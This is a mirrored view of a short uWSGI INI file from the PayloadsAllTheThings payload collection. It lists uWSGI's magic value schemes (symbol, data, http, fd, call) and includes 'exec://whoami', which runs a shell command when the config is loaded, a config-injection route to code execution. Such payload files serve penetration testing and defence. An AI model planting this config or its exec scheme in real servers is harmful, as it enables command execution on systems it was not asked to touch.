mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
13 lines
352 B
INI
13 lines
352 B
INI
|
[uwsgi]
|
||
|
; read from a symbol
|
||
|
foo = @(sym://uwsgi_funny_function)
|
||
|
; read from binary appended data
|
||
|
bar = @(data://[REDACTED])
|
||
|
; read from http
|
||
|
test = @(http://[REDACTED])
|
||
|
; read from a file descriptor
|
||
|
content = @(fd://[REDACTED])
|
||
|
; read from a process stdout
|
||
|
body = @(exec://whoami)
|
||
|
; call a function returning a char *
|
||
|
characters = @(call://uwsgi_func)
|